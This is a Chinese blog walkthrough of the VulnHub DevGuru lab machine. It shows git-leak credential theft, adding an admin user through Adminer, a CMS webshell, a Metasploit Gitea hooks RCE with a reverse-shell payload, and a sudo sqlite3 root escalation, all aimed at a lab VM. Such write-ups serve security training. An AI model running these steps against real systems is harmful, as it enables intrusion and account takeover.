Vulnhub - DevGuru

已于 2024-03-14 07:06:47 修改
阅读量878 收藏 22
点赞数 27
分类专栏: Vulnhub靶机 文章标签: Vulnhub Devguru Vulnhub-DevGuru CVE-2020-14144 CVE-2021-3156 SUDO
于 2024-03-14 06:56:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46081990/article/details/136696283
版权

希望和各位大佬一起学习,如果文章内容有错请多多指正,谢谢!  

个人博客链接:CH4SER的个人BLOG – Welcome To Ch4ser's Blog

DevGuru 靶机下载地址:DevGuru: 1 ~ VulnHub

目录

0x01 信息收集

0x02 Web漏洞利用 - Webshell写入&CVE-2020-14144

0x03 权限提升 - SUDO&CVE-2021-3156

0x01 信息收集

Nmap扫描目标主机,发现开放22、80、8585端口,分别运行OpenSSH 7.6p1、Apache httpd 2.4.29服务。

访问80端口页面如下。Wappalyzer显示操作系统为Ubuntu,CMS为October CMS,数据库管理器为Adminer 4.7.7,编程语言为PHP、GO。 

DirSearch扫描80端口网站目录,发现存在Git源码泄露、管理员后台登录地址、数据库管理器地址。 

python dirsearch.py -u "http://192.168.196.139/" -z yes

数据库管理器:http://192.168.196.139/adminer.php

管理员后台登录:http://192.168.196.139/backend/backend/auth

访问8585端口,发现是一个Gitea网站(一款使用Golang编写的可自运营的代码管理工具)。

0x02 Web漏洞利用 - Webshell写入&CVE-2020-14144

由于80端口网站存在Git源码泄露,通过GitHack下载其Git源码,如下:

python GitHack.py -u "http://192.168.196.139/.git/"

翻阅源码,发现 /config/database.php存在MySQL数据库账号密码泄露,用户为october。

'database'   => 'octoberdb',
'username'   => 'october',
'password'   => 'SQ66EBYx4GT3byXH',

使用october的账号密码登录Adminer(数据库: octoberdb),在backend_users表观察到用户frank的password hash,尝试使用john解密失败,但得知其加密方式为bcrypt。

使用在线网站生成bcrypt密码hash值,如下:

bcrypt hash在线生成:Bcrypt-Generator.com - Generate, Check, Hash, Decode Bcrypt Strings

 新建用户ch4ser,将生成的hash填入password,并设置is_superuser=1,如下:

PS:另一种方法

新增用户ch4ser,password选择encrypt,is_superuser选择1。在backend_users_groups表将用户ch4ser添加到管理员组。这种方法不具有普遍性,这里能用是因为password可以选择encrypt。

在管理员后台成功登录用户ch4ser。选择左上角CMS模块,观察到访问/blog路由会触发onStart()方法。

于是新建一个模板shell,尝试触发onStart()方法写入webshell。访问/shell报错,通过报错信息得知webshell写入成功。

蚁剑连接webshell成功,翻阅目录找到了备份文件/var/backups/app.ini.bak,其中存在另一个用户gitea的MySQL账号密码泄露。

DB_TYPE             = mysql
HOST                = 127.0.0.1:3306
NAME                = gitea
USER                = gitea
PASSWD              = UfFPTF8C8jjxVF2m

使用gitea的账号密码登录Adminer(数据库: gitea),在user表观察到Gitea管理员frank的密码加密算法为pbkdf2,还有rand和salt看似是加密的。

尝试使用john、hashcat破解Gitea管理员frank的密码,未成功。

在GitHub找到Gitea源码,在该存储库下搜索关键字"pbkdf2",其使用pbkdf2算法进行加密,生成长度为50的hash值,迭代次数为10000,Salt就是之前的Bop8nwtUiM。

Gitea源码地址:https://github.com/search?q=repo%3Ago-gitea%2Fgitea+pbkdf2&type=code

使用在线网站生成pbkdf2密码,填写已知信息Salt、明文、迭代次数、生成的hash长度。

Salt=Bop8nwtUiM
Plain-text=123456
Iterations=10000
Key size (bytes)=50

替换Gitea管理员frank的密码hash值,成功登录8585端口的Gitea。

 

MSF搜索Gitea相关漏洞发现CVE-2020-14144,该漏洞需要认证才可使用,我们现在已满足条件,设置好options然后run,成功拿下frank的普通用户权限。

msf6 > use exploit/multi/http/gitea_git_hooks_rce
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/gitea_git_hooks_rce) > set username frank
username => frank
msf6 exploit(multi/http/gitea_git_hooks_rce) > set password 123456
password => 123456
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rhosts 192.168.196.139
rhosts => 192.168.196.139
msf6 exploit(multi/http/gitea_git_hooks_rce) > set rport 8585
rport => 8585
msf6 exploit(multi/http/gitea_git_hooks_rce) > set lhost 192.168.196.128
lhost => 192.168.196.128
msf6 exploit(multi/http/gitea_git_hooks_rce) > run

或者直接复现该漏洞也行,进入项目 >> Settings >> Git Hooks >> Update 写上bash反弹命令保存,Kali这边nc监听,更新项目任意文件即可收到会话。

0x03 权限提升 - SUDO&CVE-2021-3156

上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。

辅助项目下载地址:GitHub - rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks

检测到sudo版本为1.8.21p2,且检测到NOPASSWD的SUDO命令:/usr/bin/sqlite3

查询GTFOBins得知sqlite3的SUDO提权方式如下,启用一个新的root权限的bash。

GTFOBins地址:

但实测以上命令不行,原因是sudo版本不符合利用条件,使用以下命令成功拿到root权限和flag:

sudo -u#-1 sqlite3 /dev/null '.shell /bin/sh'

另外也可以通过sudo本身漏洞提权,只要版本符合CVE-2021-3156利用条件或者执行命令 sudoedit -s / 报错,漏洞即存在。

Ch4ser
关注
  • 27
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub-Nagini.txt
06-10
Nagini
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
03-07
VulnHub-Walkthroughs:Alienum的md格式的VulnHub演练
Hackthebox e Vulnhub - Dicas e Truques.pdf
10-06
网络安全渗透测试
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并直接向查询和反馈。 跟着我们 Kioptrix:1.3级 Kioprtix:5 安全操作系统:1 订书机 SickOS 1.1 SickOS 1.2 简单的 凯夫吉尔 米尔内特 牛头怪 空字节 VulnOS:1 VulnOS:2.0 新鲜地 塞德纳 恶梦 奥库斯 比卢:B0x 莫里亚1.1 Lazysys管理员 斗牛犬 BTRSys:DV 2.1 BTRSys 1 难以置信地容易 狄娜 Born2Root G0rmint 基本渗透 BSides Vancuver:2018年 Toppo:1 Billu Box 2 基
VulnHub-DevGuru: 1
热门推荐
江左盟的博客
08-06 1万+
信息收集 使用Nmap扫描目标主机发现目标主机开启22,80和8585端口,分别运行着OpenSSH 7.6p1服务,Apache httpd 2.4.29服务和git存储库,且服务器80端口存在.git目录,操作系统为Ubuntu,如图: 利用GitHack将源码下载到本地,如图: 查看README.md文件发现该网站使用October CMS,查看config/database.php文件发现MySQL数据库:octoberdb,用...
vulnhub--devguru
weixin_45922278的博客
02-10 636
描述 DevGuru是一家虚构的Web开发公司,它聘请您进行渗透测试。您的任务是在他们的公司网站上查找漏洞并获得根。 就像OSCP一样〜现实生活为基础 难度:中级(取决于经验) 目录 一、信息搜集 1.nmap端口扫描: 2.dirsearch目录扫描: 二、漏洞探测&利用 1 . GitHack.py 2.登入cms后台 1)写入一句话木马。 2)或者反弹shell 3.获取gitea数据库密码 1)在github 找到加密方式(大佬方式) 2)在gethub上...
vulnhub-DevGuru:1
yutianovo的博客
12-24 895
靶机描述 DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on their corporate website and obtaining root. OSCP like ~ Real life based Difficulty: Intermediate (Depends on exp
vulnhubdevguru靶场打靶
maple_leaf
10-19 365
Devguruvulnhub中一个靶场,DevGuru 是一家虚构的网络开发公司,聘请您进行渗透测试评估。您的任务是在其公司网站上查找漏洞并获得root
Vulnhub-Devguru writeup
weixin_52641450的博客
01-16 1120
Vulnhub-Devguru writeup
VulnHub-Tr0ll1.zip
01-12
VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
VulnHub靶场笔记 - DevGuru: 1(OSCP推荐靶场)
m0_62652276的博客
12-02 1052
OSCP推荐靶场:VulnHub DevGuru: 1 个人打靶笔记
Vulnhub - Jarbas
qq_46081990的博客
03-16 310
Nmap扫描目标主机,发现开放22、80、8080、3306端口,分别运行OpenSSH 7.4、Apache httpd 2.4.6、Jetty、MariaDB服务,目标操作系统为Linux。因开放3306端口,猜测可能为MySQL账号密码,尝试连接但失败。对于类Github的中间件,比如上个靶场Devguru的Gitea,都可以去寻找有没有命令执行的地方,然后尝试反弹shell。将bash反弹命令追加到后面去,Kali这边nc监听5555端口,等待一段时间,成功收到会话拿到root权限和flag。
vulnhub devguru渗透笔记
weixin_52268949的博客
03-26 613
靶机下载地址:https://vulnhub.com/entry/devguru-1,620/
vulnhubdevguru靶场提权过程(vulnhub打靶日记)
guanjian_ci的博客
04-02 861
考点:1、拿下站点、敏感文件后,需要细心的审计搜索有价值的信息,特别是账号密码。2、常见网站october、gieat的历史漏洞,利用已知漏洞反弹shell,拿下网站。3、熟悉数据库后台创建用户,添加用户组,编辑用户的操作。4、了解linux提权常用操作,内核漏洞>suid/sudo>环境变量/计划任务等等。难点:1、常见网站october、gieat的历史漏洞,这些站点的漏洞能否成功利用提权,对于小白来说是块硬骨头。2、获取mysql的frank用户时,此处用的是修改加密方式、修改密码。
基于GEC6818五子棋游戏GEC6818_Gomoku.zip
05-12
五子棋游戏想必大家都非常熟悉,游戏规则十分简单。游戏开始后,玩家在游戏设置中选择人机对战,则系统执黑棋,玩家自己执白棋。双方轮流下一棋,先将横、竖或斜线的5个或5个以上同色棋子连成不间断的一排者为胜。 【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。 【技术】 Java、Python、Node.js、Spring Boot、Django、Express、MySQL、PostgreSQL、MongoDB、React、Angular、Vue、Bootstrap、Material-UI、Redis、Docker、Kubernetes
单片机C语言Proteus仿真实例左右来回的流水灯
05-12
单片机C语言Proteus仿真实例左右来回的流水灯提取方式是百度网盘分享地址
电能表接线错误分析软件.zip
05-12
电能表接线错误分析软件
setuptools-3.8.1.tar.gz
最新发布
05-12
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值